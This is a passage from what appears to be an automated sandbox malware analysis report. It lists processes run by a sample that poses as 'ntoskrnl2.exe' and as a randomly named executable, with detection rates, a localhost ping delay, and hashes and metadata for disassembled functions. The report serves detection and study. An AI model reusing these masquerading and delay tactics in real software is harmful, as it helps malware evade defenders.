                                                            Start time:07:33:20
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\chcp.com
                                                            Wow64 process (32bit):false
                                                            Commandline:chcp 65001
                                                            Imagebase:0x7ff6dad60000
                                                            File size:14'848 bytes
                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:48
                                                            Start time:07:33:20
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\ntoskrnl2.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\ntoskrnl2.exe
                                                            Imagebase:0xb40000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:49
                                                            Start time:07:33:20
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                                                            Imagebase:0x9c0000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 88%, ReversingLabs
                                                            • Detection: 75%, Virustotal, Browse
                                                            Has exited:true

                                                            General

                                                            Target ID:50
                                                            Start time:07:33:20
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                                                            Imagebase:0xd90000
                                                            File size:1'430'164 bytes
                                                            MD5 hash:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:51
                                                            Start time:07:33:23
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\PING.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:ping -n 10 localhost
                                                            Imagebase:0x7ff7a3470000
                                                            File size:22'528 bytes
                                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:52
                                                            Start time:07:33:27
                                                            Start date:02/09/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff717f30000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:7.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:4
                                                              Total number of Limit Nodes:0
                                                              execution_graph 7801 7ffd346cae5f 7803 7ffd346caeb6 7801->7803 7802 7ffd346cafa6 QueryFullProcessImageNameA 7804 7ffd346cb004 7802->7804 7803->7802 7803->7803

                                                              Executed Functions

                                                              Function 00007FFD346CAE5F Relevance: 1.7, APIs: 1, Instructions: 238COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2392216196.00007FFD346C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd346c0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID: FullImageNameProcessQuery
                                                              • String ID:
                                                              • API String ID: 3578328331-0
                                                              • Opcode ID: c7d26da5b7731919770a9544964c24bd2fb7f6d79952b8767ac7e61c24873c9d
                                                              • Instruction ID: 1e42d67d4bb19043d64b9620433b58645562b5bda94918efdf481f4a2889fc50
                                                              • Opcode Fuzzy Hash: c7d26da5b7731919770a9544964c24bd2fb7f6d79952b8767ac7e61c24873c9d
                                                              • Instruction Fuzzy Hash: BF718030618A4D8FDB68EF28D8957F977E1FB59311F10823EE84EC7291CB75A8458B81
                                                              Function 00007FFD342F0A19 Relevance: .3, Instructions: 283COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 905fd2b58fa46a246a2331988a7635364c295f29a6c675febd829e89bb4cf444
                                                              • Instruction ID: 372c739522678588fce1c695c9f0a2de7317d9cbc39064583bd9bcf2ae2311ef
                                                              • Opcode Fuzzy Hash: 905fd2b58fa46a246a2331988a7635364c295f29a6c675febd829e89bb4cf444
                                                              • Instruction Fuzzy Hash: A971672AB2DA4A4AE768667C48A53B976C2EF8B311F65023DD5DFC32C3EC1D68075240
                                                              Function 00007FFD342F1A0D Relevance: .2, Instructions: 233COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 94fb42f393d1fa382fa82a3cc13372ec7b6da4c02319aaa4268f3aec6512326f
                                                              • Instruction ID: 85256b80d1e96f30fe5666c6247d36fe6108c1841da287e96c93dc1e7ddceeb3
                                                              • Opcode Fuzzy Hash: 94fb42f393d1fa382fa82a3cc13372ec7b6da4c02319aaa4268f3aec6512326f
                                                              • Instruction Fuzzy Hash: A9810626E0C69A8FE751DBA8D4B52F97FA0EF52314F4801BBD088EB193DE296805C741
                                                              Function 00007FFD342F083D Relevance: .2, Instructions: 187COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0ca4cd0811b27702f6c39cdeef44f944aa77cb2187717f3012562ba855a06ff
                                                              • Instruction ID: 84117dae08e5d8b478b0ead469efb8aa6a6076fc8ff823193f434934f056a160
                                                              • Opcode Fuzzy Hash: a0ca4cd0811b27702f6c39cdeef44f944aa77cb2187717f3012562ba855a06ff
                                                              • Instruction Fuzzy Hash: 24514D37F0C6588FD7A0DB3C84A56BA77E0FF4A310B45417FE599D7292DE28A8418741
                                                              Function 00007FFD342F1C45 Relevance: .1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 193e7c791189b23db810dace5855a4104e178a10228ff0b6d97329a5645f4365
                                                              • Instruction ID: e64909b999bd05d46c1b4f967f8c88aebb4896f772d1bb635186023ae01390c9
                                                              • Opcode Fuzzy Hash: 193e7c791189b23db810dace5855a4104e178a10228ff0b6d97329a5645f4365
                                                              • Instruction Fuzzy Hash: 23418075A04A498FF798DF58D4A93E57BE1EB69300F90017ED01DE73A2DABA28498740
                                                              Function 00007FFD342F155D Relevance: .1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 469d17b4d5b731733ba69c184de1da125addaf7d11674a1c90f21ccb15bf37d2
                                                              • Instruction ID: 9de0683e769bc6052450376785064ed5573e882834fe2da4eacda0cb75ae9798
                                                              • Opcode Fuzzy Hash: 469d17b4d5b731733ba69c184de1da125addaf7d11674a1c90f21ccb15bf37d2
                                                              • Instruction Fuzzy Hash: 74310836B0C2998FE701FBB8D8612ECBBB0EF12321F9441B7C254D7182DA396949C791
                                                              Function 00007FFD342F12E8 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3657b54d05f48dc2d17502f23b4750e7b0b7ee875df88e528eec2b8747c67703
                                                              • Instruction ID: 38d915a3e8543aa0c6970a82dc60b4e11cce811e6f7b385fc8aff9733beca0e8
                                                              • Opcode Fuzzy Hash: 3657b54d05f48dc2d17502f23b4750e7b0b7ee875df88e528eec2b8747c67703
                                                              • Instruction Fuzzy Hash: 8B21D422B189594FEB98E76C54A967577C6EF9D311F9400BEF80DD32D3DC2DAC418280
                                                              Function 00007FFD342F0CB9 Relevance: .1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2707fd2ab75fafd9e5c85e1dcd91d00607ed63c2f16dfc354d687323772fd7fa
                                                              • Instruction ID: d5ce9e4cecb1506714109cd5c599681267e3efc26514e1f409b00e56f03ce450
                                                              • Opcode Fuzzy Hash: 2707fd2ab75fafd9e5c85e1dcd91d00607ed63c2f16dfc354d687323772fd7fa
                                                              • Instruction Fuzzy Hash: B7218457B0D7A646E379552C6CB12797BE2DF86200F9801BAE59AD22C3ED0EA8056380
                                                              Function 00007FFD342F0868 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6255c40d367bab1ae502d8456ba13a66cf4dfc966fd61b4abf3877372229b163
                                                              • Instruction ID: 263bac11a49cc45bf177b42ed44bbd30243b913b5ea48fea5ca9cb8e9d36a230
                                                              • Opcode Fuzzy Hash: 6255c40d367bab1ae502d8456ba13a66cf4dfc966fd61b4abf3877372229b163
                                                              • Instruction Fuzzy Hash: 98117A33A5C7488FDB21EB3848595EA7FE0FF4A315F00053FE88AD3282EA3494008382
                                                              Function 00007FFD342F1588 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe161c7de4bf84213ece0fccc8a5824df074efe3c7b9a0e806356c1d0253e362
                                                              • Instruction ID: a501c6b927462df0f4493ad78ae8168303f5456dfd9463b928d5debb1334989b
                                                              • Opcode Fuzzy Hash: fe161c7de4bf84213ece0fccc8a5824df074efe3c7b9a0e806356c1d0253e362
                                                              • Instruction Fuzzy Hash: BB11A536B0C7998FE702EBB4C8611DDBBB0EF46311F5941B7C154D7192EA386A49C781
                                                              Function 00007FFD342F1E1D Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: edea8c732ac3f152046b55f33c14228954bbc92003f0dc0cf5662b986fe6c02f
                                                              • Instruction ID: 56aeb29e0d28e218dd67b5eb001fce319412792161340d484c34a34f5cd458b6
                                                              • Opcode Fuzzy Hash: edea8c732ac3f152046b55f33c14228954bbc92003f0dc0cf5662b986fe6c02f
                                                              • Instruction Fuzzy Hash: E801442198D6C64FD31A5BB08C706F23BE5CF8B21074901FAE089CB0A3CC0E5C82C3A1
                                                              Function 00007FFD342F1590 Relevance: .0, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e6fc706eaa28e6490447ca285280084bdaa9bdac07e91aac9bb86cc0604ef71c
                                                              • Instruction ID: ff48d8c2116a389e28b58b3b8f260ce6fd2cfadcd0603516a28780568d74ce05
                                                              • Opcode Fuzzy Hash: e6fc706eaa28e6490447ca285280084bdaa9bdac07e91aac9bb86cc0604ef71c
                                                              • Instruction Fuzzy Hash: 90016135B096899FE702EBB4C8611DDBBB0EF46310F5541B6C154D7192EA386A49C741
                                                              Function 00007FFD342F1598 Relevance: .0, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d772212aa72ffbb0747cc0f486fc7a8bb338d70c70fba9cb08698f69ed73184
                                                              • Instruction ID: ece35b1cdd74bab1451815f8d190246e88027d4530708145db09aef0e0e7a250
                                                              • Opcode Fuzzy Hash: 5d772212aa72ffbb0747cc0f486fc7a8bb338d70c70fba9cb08698f69ed73184
                                                              • Instruction Fuzzy Hash: 95015E35A0D2899FD702EBB4C8A01ADBFB0AF07310F5941E6C144DB192EA39AA49C741
                                                              Function 00007FFD342F15A0 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ee3b3318be0ca7453fafb6d80a0f53a76a42d7bd427554cc83314935841c1f5
                                                              • Instruction ID: c9e6fb91cfb77a05336338d055a2430ca866d86b8693f76ede3f33bb09f6e7a1
                                                              • Opcode Fuzzy Hash: 1ee3b3318be0ca7453fafb6d80a0f53a76a42d7bd427554cc83314935841c1f5
                                                              • Instruction Fuzzy Hash: 70014F35A0D289DFE702DBB484A41AD7FB0AF07314F9841E6C045DB192E9396A48D741
                                                              Function 00007FFD342F1E50 Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a775dbb232493aa46f0aade595565821f57c0c4832669c4bd6b0fba5648b2d46
                                                              • Instruction ID: 5ab488b8bb942fc7a6d3aaec24c3e3054fdabfb7f39ca3c47eec1578c2d31937
                                                              • Opcode Fuzzy Hash: a775dbb232493aa46f0aade595565821f57c0c4832669c4bd6b0fba5648b2d46
                                                              • Instruction Fuzzy Hash: 2CE02625B5C81907DB7CA9B468712B07380DB49218B48017ED01AC22C3CC0E5C818280
                                                              Function 00007FFD342F4D19 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction ID: 54a92ea8713e8f47f01fa6795ecc522907369551022cd261ec46de96f6c01f16
                                                              • Opcode Fuzzy Hash: e881298cfd14e8c9150868562bd47c6cd504156f1e4f731a20d79e8f392c0259
                                                              • Instruction Fuzzy Hash: 5DE01226F0802A86FB549584C8A0BB86250EF59300F9040B9DB4EF33C1CD3DAE45EB55
                                                              Function 00007FFD342F2759 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 91c3cd49e5ec5995297b44fac8210c2f7b8a443ae5c903bb149213aca00019ef
                                                              • Instruction ID: 26b5ddb6a35389f8ab1e3f449b81a20379b854c48449ce54d80f1933929ce413
                                                              • Opcode Fuzzy Hash: 91c3cd49e5ec5995297b44fac8210c2f7b8a443ae5c903bb149213aca00019ef
                                                              • Instruction Fuzzy Hash: C7D0C776E195598BDB91C904C4E47987791FF59340F5542F5D80CE3242C63AEE81FB50
                                                              Function 00007FFD342F1765 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction ID: 04d1f5c987c48eaddb74f03021256823366f4f0b22b99d682052d99e1936fe10
                                                              • Opcode Fuzzy Hash: cba79f2dbca1c696d37c7b5fc20d58c59afe4a8b7d73ad09e99c4b4acf299eed
                                                              • Instruction Fuzzy Hash: 6EC08C3861580CCFC908EB2DC89890837B0FF0B304BD200A0E10DC7271D21ADCC2D781
                                                              Function 00007FFD342F0705 Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction ID: 50e8b32d526d26fb05214072f7cc609a8ae39d2282440d944bd8eb793cdad308
                                                              • Opcode Fuzzy Hash: a639b3564ed9c4d7f08e483827c598cc53053e9eb7a6ba061c0ad34698e08247
                                                              • Instruction Fuzzy Hash: 8CC08C0FF0AC1AC0A92031AA18E60BCA2009FCA210FD000F2D30CE00C1AC0F24852982
                                                              Function 00007FFD342F0728 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2388952979.00007FFD342F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd342f0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction ID: ed4996c480c138126ce251633160d3b22ece0c01a88eff0dfaad808388257bf6
                                                              • Opcode Fuzzy Hash: e78ea6b3030d760a74df1bc8464bf9cd0e5a2ec463c3bc26d52070dedf33905e
                                                              • Instruction Fuzzy Hash: E2B01209D5680E40A91431F608D747474005F86100FC00170E608D00C2DC4F14942242

                                                              Non-executed Functions

                                                              Function 00007FFD346C9DDD Relevance: 1.8, Strings: 1, Instructions: 528COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2392216196.00007FFD346C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd346c0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H@4
                                                              • API String ID: 0-2702700947
                                                              • Opcode ID: 10b5a806065058f47d1b53eb7091d64d47801b8f447c409da9db3c0ff08da1cf
                                                              • Instruction ID: efd881d360cdf9b39b31fb6e91f81d080278710718156b164110b1c6733bae07
                                                              • Opcode Fuzzy Hash: 10b5a806065058f47d1b53eb7091d64d47801b8f447c409da9db3c0ff08da1cf
                                                              • Instruction Fuzzy Hash: 63026E31B189694FEB98FF6888A53B973D1EF9A300F540179E50ED32D2DD2DAC429B41
                                                              Function 00007FFD346C7B63 Relevance: .1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2392216196.00007FFD346C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd346c0000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ca80d6dc744e4aa9a80d9e10e03bb17064db72c80bdc5c437fa203c1475c148
                                                              • Instruction ID: 5d5ee6e478bceadbc657b8b6a79b71078532e303c54bac1258c7844da19a0dd2
                                                              • Opcode Fuzzy Hash: 8ca80d6dc744e4aa9a80d9e10e03bb17064db72c80bdc5c437fa203c1475c148
                                                              • Instruction Fuzzy Hash: 55513970A085098FEB98EFA4C4A5AFD77B2FF59311F550079D00AEB291CF396981CB40
                                                              Function 00007FFD34455C6A Relevance: 6.7, Strings: 5, Instructions: 401COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2390580725.00007FFD34450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34450000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffd34450000_ntoskrnl2.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HmD4$HmD4$HmD4$HmD4$HmD4
                                                              • API String ID: 0-3599651941
                                                              • Opcode ID: 76ce6b7b4a50ba0893bb9d879893a9328481923ca616a90422d2202da907ee89
                                                              • Instruction ID: 8e21d23d363f9d7e48a17e5f2185a8157aa80e94d4b730d8b2884a3b1cb9f080
                                                              • Opcode Fuzzy Hash: 76ce6b7b4a50ba0893bb9d879893a9328481923ca616a90422d2202da907ee89
                                                              • Instruction Fuzzy Hash: 66E11F71A18E594FEF94EF08C8A5AA4B7E1FB58304F4441FED08DE36C2CE74A9818B41

                                                              Executed Functions

                                                              Function 00007FFD343E6630 Relevance: 7.9, Strings: 6, Instructions: 412COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.3819892256.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_7ffd343e0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (Bc4$(Bc4$(Bc4$(Bc4$(Bc4$X7gI
                                                              • API String ID: 0-2906288894
                                                              • Opcode ID: caacfd1fa3cc0eddd6f26efc89028ec0978ab7c31e360ed463f88bdb5e3034bc
                                                              • Instruction ID: 6d424e81afb93ebefe48834001b0564c1fc1c768bbae3eabaf2a8dbbb6dcea84
                                                              • Opcode Fuzzy Hash: caacfd1fa3cc0eddd6f26efc89028ec0978ab7c31e360ed463f88bdb5e3034bc
                                                              • Instruction Fuzzy Hash: 79C14933B8EA894FE7A5FB6848A45BA7BD1EF52314F4C01BED14CD70A3D928A845C341
                                                              Function 00007FFD3431B71C Relevance: .3, Instructions: 289COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.3805013071.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_7ffd34310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: efae5340a049cf2a9299eb3bc157ce600c64ac72d00e19cd8100389fcaecb313
                                                              • Instruction ID: aebc6e44da51d19d325b9bf5506210f9a62c4cdcbe9b0d06104608b3a24da1f2
                                                              • Opcode Fuzzy Hash: efae5340a049cf2a9299eb3bc157ce600c64ac72d00e19cd8100389fcaecb313
                                                              • Instruction Fuzzy Hash: 5281057161CB894FD759EF28C8956A57BE0EF97320F0401BED08AC71A3DA39A846CB51
                                                              Function 00007FFD34319748 Relevance: .1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.3805013071.00007FFD34310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_7ffd34310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04eef0a9b86267ad02dd67885f705754b1912641de9ade3585cc32b5a09a3af5
                                                              • Instruction ID: 6ad4e606fdbcf9cd2b19327b3b288eed2ad5eddcd7c713fd50f922f59bcfc149
                                                              • Opcode Fuzzy Hash: 04eef0a9b86267ad02dd67885f705754b1912641de9ade3585cc32b5a09a3af5
                                                              • Instruction Fuzzy Hash: 20412971A0DF885FEB58AF1C98566E97BE0FF56310F04426FD049D3242DA34A815CBC6
                                                              Function 00007FFD341FEAA8 Relevance: .1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000001C.00000002.3789681462.00007FFD341FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD341FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_28_2_7ffd341fd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a0609deddf443807a764d5a328e7bb5c2be2860fcfed32f2a940d006a3cceb59
                                                              • Instruction ID: 0732bf9878af7ecd4e6a77a23043c918a1c039aa9267ce4d54dee2e204aa2f47
